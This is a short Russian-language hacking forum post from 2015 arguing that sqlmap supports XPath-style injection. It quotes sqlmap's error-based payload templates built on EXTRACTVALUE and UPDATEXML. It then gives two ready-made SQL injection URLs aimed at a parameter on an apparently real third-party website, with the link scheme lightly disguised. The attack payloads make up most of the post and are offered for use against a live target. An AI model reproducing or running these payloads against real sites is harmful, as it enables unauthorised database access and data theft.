Показать сообщение отдельно

  #49  
Старый 18.11.2015, 22:00
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от psihoz26  

нет не работает он с XPath inj.
Юзай Xpath blind explorer. Он кривой но хоть чтото. Если будут проблемы - пишите помогу.
НЕТ, РАБОТАЕТ!!!

https://github.com/sqlmapproject/sql...rror_based.xml

Вот выдержка из реализации payloads в sqlmap:

Цитата:
Сообщение от None  
OR
EXTRACTVALUE
([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
..............
AND
UPDATEXML
([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
вот примеры функций что юзаются:

_ttp://staynaughty.com/wall.php?uid=442+or(ExtractValue(1,version()))

_ttp://staynaughty.com/wall.php?uid=442+or(UPDATEXML(1,version(),2))
 
Ответить с цитированием